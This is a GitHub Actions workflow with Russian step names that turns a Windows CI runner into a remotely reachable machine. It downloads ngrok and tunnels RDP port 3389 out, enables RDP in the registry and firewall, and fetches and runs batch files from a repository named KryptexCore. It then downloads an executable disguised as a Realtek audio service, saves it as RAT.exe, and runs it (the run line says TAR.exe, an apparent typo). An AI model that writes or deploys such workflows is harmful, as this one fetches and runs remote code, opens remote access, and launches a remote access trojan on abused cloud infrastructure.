name: launch

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-2019
    timeout-minutes: 9999

    steps:
    - name: Загрузка необходимого для запуска ПО.
      run: |
        Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/KryptexCore/main/files/install.bat -OutFile install.bat
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/KryptexCore/main/files/exit.bat -OutFile exit.bat
    - name: Распаковка Ngrok файла.
      run: Expand-Archive ngrok.zip
    - name: Подключение к учётной записи Ngrok.
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Включение доступа RDP.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Создание туннеля.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region eu 3389"'
    - name: Настройка VDS.
      run: |
        Remove-item "C:\Users\Public\Desktop\*.lnk" -Force
        cmd /c install.bat
    - name: Запуск RAT
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/ThePyGoose/KryptexCore/RtkAudUService32.exe -Outfile RAT.exe
        ./TAR.exe
    - name: Запуск виртуальной машины выполнен
      run: cmd /c exit.bat
